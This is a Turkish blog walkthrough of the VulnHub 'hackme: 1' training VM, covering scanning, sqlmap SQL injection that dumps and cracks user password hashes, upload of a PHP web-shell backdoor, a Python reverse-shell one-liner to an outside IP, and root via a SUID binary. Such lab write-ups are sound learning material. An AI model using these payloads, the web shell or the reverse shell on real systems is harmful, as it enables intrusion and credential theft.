İçeriğe geç

HACKME: 1

Makine Hakkında Bilgiler

Açıklama:
'hackme' is a beginner difficulty level box. The goal is to gain limited privilege access via web vulnerabilities and subsequently privilege escalate as root. The lab was created to mimic real life environment.

'hackme' uses DHCP and in the possible event that the mysqld shuts down on its own (very rare cases), attempt to force restart the machine and it should be working fine subsequently.

This works better with VirtualBox rather than VMware

Vulnhub Sayfası:
https://www.vulnhub.com/entry/hackme-1,330/

İndirme Sayfası:
https://download.vulnhub.com/hackme/hackme.ova

Walkthrough

Makineyi tespit ederek başlayalım.

┌──(root💀kali)-[~]
└─# ifconfig eth0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.6.132  netmask 255.255.255.0  broadcast 192.168.6.255
        inet6 fe80::20c:29ff:fe97:a8e4  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:97:a8:e4  txqueuelen 1000  (Ethernet)
        RX packets 3  bytes 180 (180.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 14  bytes 1054 (1.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(root💀kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:97:a8:e4, IPv4: 192.168.6.132
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.1 00:50:56:c0:00:08   VMware, Inc.
192.168.6.2 00:50:56:f3:da:b0   VMware, Inc.
192.168.6.133   00:0c:29:20:57:2c   VMware, Inc.
192.168.6.254   00:50:56:fd:11:c9   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.993 seconds (128.45 hosts/sec). 4 responded

nmap taraması ile devam edelim.

[*] Scan: 787
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 12:53 EDT
Nmap scan report for 192.168.6.133
Host is up (0.00072s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6b:a8:24:d6:09:2f:c9:9a:8e:ab:bc:6e:7d:4e:b9:ad (RSA)
|   256 ab:e8:4f:53:38:06:2c:6a:f3:92:e3:97:4a:0e:3e:d1 (ECDSA)
|_  256 32:76:90:b8:7d:fc:a4:32:63:10:cd:67:61:49:d6:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 00:0C:29:20:57:2C (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.72 ms 192.168.6.133

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.59 seconds

80 porunu görünce nikto ve gobuster denedim. Daha sonrasında tarayıcı üzerinden incelemeye başladım.

┌──(root💀kali)-[~]
└─# gobuster dir --url http://192.168.6.133 --add-slash --expanded --follow-redirect --status-codes-blacklist 404 --extensions php,html,bak,sql,txt,zip,rar,7z,conf,php5,sh,bash,cap,pcap -t 50 -w /usr/share/wordlists/dirb/big.txt --no-error | tee gobuster/1

tee: gobuster/1: No such file or directory
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.6.133
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              zip,7z,pcap,bak,sql,txt,rar,php5,sh,cap,php,html,conf,bash
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2021/07/09 10:40:09 Starting gobuster in directory enumeration mode
===============================================================
http://192.168.6.133/.htpasswd.bak        (Status: 403) [Size: 301]
http://192.168.6.133/.htpasswd.rar        (Status: 403) [Size: 301]
http://192.168.6.133/.htpasswd.txt        (Status: 403) [Size: 301]
http://192.168.6.133/.htpasswd.pcap       (Status: 403) [Size: 302]
http://192.168.6.133/.htpasswd/           (Status: 403) [Size: 298]
http://192.168.6.133/.htpasswd.php5       (Status: 403) [Size: 302]
http://192.168.6.133/.htpasswd.sh         (Status: 403) [Size: 300]
http://192.168.6.133/.htpasswd.cap        (Status: 403) [Size: 301]
http://192.168.6.133/.htpasswd.html       (Status: 403) [Size: 302]
http://192.168.6.133/.htaccess.cap        (Status: 403) [Size: 301]
http://192.168.6.133/.htaccess.php        (Status: 403) [Size: 301]
http://192.168.6.133/.htaccess.pcap       (Status: 403) [Size: 302]
http://192.168.6.133/.htaccess.php5       (Status: 403) [Size: 302]
http://192.168.6.133/.htaccess/           (Status: 403) [Size: 298]
http://192.168.6.133/.htaccess.html       (Status: 403) [Size: 302]
http://192.168.6.133/.htaccess.7z         (Status: 403) [Size: 300]
http://192.168.6.133/.htaccess.sh         (Status: 403) [Size: 300]
http://192.168.6.133/.htaccess.sql        (Status: 403) [Size: 301]
http://192.168.6.133/.htaccess.txt        (Status: 403) [Size: 301]
http://192.168.6.133/.htaccess.conf       (Status: 403) [Size: 302]
http://192.168.6.133/.htaccess.bash       (Status: 403) [Size: 302]
http://192.168.6.133/.htaccess.bak        (Status: 403) [Size: 301]
http://192.168.6.133/.htaccess.zip        (Status: 403) [Size: 301]
http://192.168.6.133/.htpasswd.conf       (Status: 403) [Size: 302]
http://192.168.6.133/.htaccess.rar        (Status: 403) [Size: 301]
http://192.168.6.133/.htpasswd.zip        (Status: 403) [Size: 301]
http://192.168.6.133/.htpasswd.7z         (Status: 403) [Size: 300]
http://192.168.6.133/.htpasswd.sql        (Status: 403) [Size: 301]
http://192.168.6.133/.htpasswd.php        (Status: 403) [Size: 301]
http://192.168.6.133/.htpasswd.bash       (Status: 403) [Size: 302]
http://192.168.6.133/config.php           (Status: 200) [Size: 0]  
http://192.168.6.133/icons/               (Status: 403) [Size: 294]
http://192.168.6.133/index.php            (Status: 200) [Size: 100]
http://192.168.6.133/logout.php           (Status: 200) [Size: 1245]
http://192.168.6.133/login.php            (Status: 200) [Size: 1245]
http://192.168.6.133/server-status/       (Status: 403) [Size: 302] 
http://192.168.6.133/register.php         (Status: 200) [Size: 1937]
http://192.168.6.133/uploads/             (Status: 200) [Size: 940] 
http://192.168.6.133/welcome.php          (Status: 200) [Size: 1245]

===============================================================
2021/07/09 10:40:41 Finished
===============================================================

Olay belli. İçeri girip bir kullanıcı elde edip ssh yapabiliriz yada web zafiyhetleri ile makineye bağlanmayı deneyeceğiz.

login sayfasına sqli denedim ancak başarılı olamadım. Bunun üzerine bir üyelik oluşturup içeri girdim. İçeride kitap arama kısmı bulunuyordu Burada sqli olabilir diye düşündüm ve aşağıdaki http isteği ile sqli buldum.


┌──(root💀kali)-[~/oscp/hackme/istekler]
└─# cat search        
POST /welcome.php HTTP/1.1
Host: 192.168.6.133
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
Origin: http://192.168.6.133
Connection: close
Referer: http://192.168.6.133/welcome.php
Cookie: PHPSESSID=gqv7oiunpot6arc05huj5cpbnu
Upgrade-Insecure-Requests: 1

search=a
┌──(root💀kali)-[~/oscp/hackme]
└─# sqlmap -r istekler/search --level=5 --risk=3 --dbs --batch -D webapphacking -T users --dump 
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.5.5#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:21:04 /2021-07-09/

[11:21:04] [INFO] parsing HTTP request from 'istekler/search'
[11:21:04] [INFO] resuming back-end DBMS 'mysql' 
[11:21:04] [INFO] testing connection to the target URL
got a 302 redirect to 'http://192.168.6.133:80/login.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=a%' AND 8214=8214 AND 'SaZe%'='SaZe

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=a%' AND (SELECT 8586 FROM (SELECT(SLEEP(5)))AsNC) AND 'NOMn%'='NOMn

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=a%' UNION ALL SELECT NULL,CONCAT(0x7178627671,0x4b694c626264456548675a4c55544a7054484a655764425a7a686a724349716a77764e456e77446d,0x7171716a71),NULL-- -
---
[11:21:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.10 (cosmic)
web application technology: Apache 2.4.34
back-end DBMS: MySQL >= 5.0.12
[11:21:05] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] webapphacking

[11:21:05] [INFO] fetching columns for table 'users' in database 'webapphacking'
[11:21:05] [INFO] fetching entries for table 'users' in database 'webapphacking'
[11:21:05] [INFO] recognized possible password hashes in column 'pasword'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[11:21:05] [INFO] using hash method 'md5_generic_passwd'
[11:21:05] [INFO] resuming password 'hello' for hash '5d41402abc4b2a76b9719d911017c592'
[11:21:05] [INFO] resuming password 'commando' for hash '6269c4f71a55b24bad0f0267d9be5508'
[11:21:05] [INFO] resuming password 'p@ssw0rd' for hash '0f359740bd1cda994f8b55330c86d845'
[11:21:05] [INFO] resuming password 'testtest' for hash '05a671c66aefea124cc08b76ea6d30bb'
[11:21:05] [INFO] resuming password 'password1' for hash '7c6a180b36896a0a8c02787eeafb0e4c'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[11:21:05] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[11:21:05] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[11:21:05] [INFO] starting 4 processes 
Database: webapphacking                                                             
Table: users
[7 entries]
+----+--------------+------------+-----------------+----------------------------------------------+
| id | name         | user       | address         | pasword                                      |
+----+--------------+------------+-----------------+----------------------------------------------+
| 1  | David        | user1      | Newton Circles  | 5d41402abc4b2a76b9719d911017c592 (hello)     |
| 2  | Beckham      | user2      | Kensington      | 6269c4f71a55b24bad0f0267d9be5508 (commando)  |
| 3  | anonymous    | user3      | anonymous       | 0f359740bd1cda994f8b55330c86d845 (p@ssw0rd)  |
| 10 | testismyname | test       | testaddress     | 05a671c66aefea124cc08b76ea6d30bb (testtest)  |
| 11 | superadmin   | superadmin | superadmin      | 2386acb2cf356944177746fc92523983             |
| 12 | test1        | test1      | test1           | 05a671c66aefea124cc08b76ea6d30bb (testtest)  |
| 13 | admin        | admin      | [email protected] | 7c6a180b36896a0a8c02787eeafb0e4c (password1) |
+----+--------------+------------+-----------------+----------------------------------------------+

[11:21:13] [INFO] table 'webapphacking.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.6.133/dump/webapphacking/users.csv'
[11:21:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.133'

[*] ending @ 11:21:13 /2021-07-09/

Görüldüğü üzere superadmin kullanıcısının hash'i kırılamadı. İnternet üzerinden bu hash'i kırdım

2386acb2cf356944177746fc92523983(Uncrackable)

Bu hesapla içeri girdiğimde bir upload kısmının olduğunu gördüm ve içeri bir web shell attım. Attığım dosya aşağıda:


┌──(root💀kali)-[/home/kali/Desktop]
└─# cat simple-backdoor.php 
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<!--    http://michaeldaw.org   2006    -->

Daha sonrasında python ile reverse aldım. Örnek python kodu:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

İçeride gezinirken mysql bilgilerinide elde ettim ancak bi işime yaramadı.

Daha öncesinden ede ettiiğim parolaları hydra ile ssh bruteforce'ta kullandım. İşe yaramadı.

Bunun üzerine çok basit ve saçma bir şekilde root oldum.

www-data@hackme:/home/legacy$ ls
ls
total 20
drwxr-xr-x 2 root root 4096 Mar 26  2019 .
drwxr-xr-x 4 root root 4096 Mar 26  2019 ..
-rwsr--r-x 1 root root 8472 Mar 26  2019 touchmenot
www-data@hackme:/home/legacy$ 

www-data@hackme:/home/legacy$ strings tou   
strings touchmenot 

Command 'strings' not found, but can be installed with:

apt install binutils
Please ask your administrator.

www-data@hackme:/home/legacy$ touchmenot
touchmenot
touchmenot: command not found
www-data@hackme:/home/legacy$ ./touchmenot
./touchmenot
root@hackme:/home/legacy# 

root@hackme:/home/legacy# id
id
uid=0(root) gid=33(www-data) groups=33(www-data)
Kategori:Walkthrough

İlk Yorumu Siz Yapın

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir